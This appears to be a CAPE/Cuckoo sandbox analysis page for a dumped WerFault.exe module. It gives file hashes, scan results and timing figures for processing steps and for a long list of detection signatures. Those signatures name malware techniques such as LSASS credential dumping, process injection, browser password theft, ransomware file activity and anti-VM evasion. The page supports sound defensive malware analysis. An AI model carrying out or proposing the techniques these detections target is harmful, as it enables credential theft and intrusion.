Module Path C:\Windows\sysnative\WerFault.exe
Type PE image: 64-bit executable
MD5 d3e6c586e13bee5122e6a90c078d6e13
SHA1 62078820be31f0dd7918ce774f11a6ec7f03e5c6
SHA256 b6b5a0675e75ee828dd9817580519c4344fb743bc8e8184a63505b217943089b
CRC32 445B6480
Ssdeep 6144:UZSOXavF7/ANUwEnfD1Dk8+pOxwov5J5+5CqS7tIN/VxHQgVJyB60OHyLC7v:Gqv5ANUleJpOxn5eDSmN9xHVc2Hyw
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename b6b5a0675e75ee828dd9817580519c4344fb743bc8e8184a63505b217943089b
Download

Comments



No comments posted

Processing ( 9.644 seconds )

  • 5.699 BehaviorAnalysis
  • 1.83 CAPE
  • 0.724 ProcDump
  • 0.444 Static
  • 0.333 Dropped
  • 0.333 TargetInfo
  • 0.109 TrID
  • 0.062 Deduplicate
  • 0.062 Strings
  • 0.042 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.001 Debug

Signatures ( 2.824 seconds )

  • 0.371 antidbg_windows
  • 0.284 lsass_credential_dumping
  • 0.26 injection_createremotethread
  • 0.25 Doppelganging
  • 0.242 InjectionCreateRemoteThread
  • 0.197 injection_runpe
  • 0.195 InjectionProcessHollowing
  • 0.173 InjectionInterProcess
  • 0.169 decoy_document
  • 0.157 NewtWire Behavior
  • 0.157 api_spamming
  • 0.132 injection_explorer
  • 0.033 antiav_detectreg
  • 0.02 antivm_vbox_window
  • 0.016 antisandbox_script_timer
  • 0.013 infostealer_ftp
  • 0.008 antivm_generic_disk
  • 0.008 infostealer_im
  • 0.008 ransomware_files
  • 0.007 mimics_filetime
  • 0.007 antianalysis_detectreg
  • 0.006 antiav_detectfile
  • 0.006 infostealer_mail
  • 0.005 bootkit
  • 0.005 stealth_file
  • 0.005 reads_self
  • 0.005 virus
  • 0.004 antivm_generic_scsi
  • 0.004 infostealer_bitcoin
  • 0.003 antidebug_guardpages
  • 0.003 exploit_heapspray
  • 0.003 antiemu_wine_func
  • 0.003 dynamic_function_loading
  • 0.003 persistence_autorun
  • 0.003 vawtrak_behavior
  • 0.003 hancitor_behavior
  • 0.003 antivm_vbox_keys
  • 0.003 ransomware_extensions
  • 0.002 malicious_dynamic_function_loading
  • 0.002 antiav_avast_libs
  • 0.002 recon_programs
  • 0.002 antivm_generic_services
  • 0.002 process_interest
  • 0.002 betabot_behavior
  • 0.002 kibex_behavior
  • 0.002 shifu_behavior
  • 0.002 infostealer_browser_password
  • 0.002 kovter_behavior
  • 0.002 antianalysis_detectfile
  • 0.002 antivm_vbox_files
  • 0.002 antivm_vmware_keys
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.002 recon_fingerprint
  • 0.001 tinba_behavior
  • 0.001 uac_bypass_eventvwr
  • 0.001 hawkeye_behavior
  • 0.001 antivm_vbox_libs
  • 0.001 rat_nanocore
  • 0.001 stack_pivot
  • 0.001 exploit_getbasekerneladdress
  • 0.001 exploit_gethaldispatchtable
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 cerber_behavior
  • 0.001 process_needed
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vpc_keys
  • 0.001 antivm_xen_keys
  • 0.001 modify_proxy
  • 0.001 darkcomet_regkeys
  • 0.001 disables_browser_warn

Reporting ( 0.027 seconds )

  • 0.021 SubmitCAPE
  • 0.006 CompressResults
Task ID 94398
Mongo ID 5d9e82f5c3c009112d67d1a1
Cuckoo release 1.3-CAPE
Delete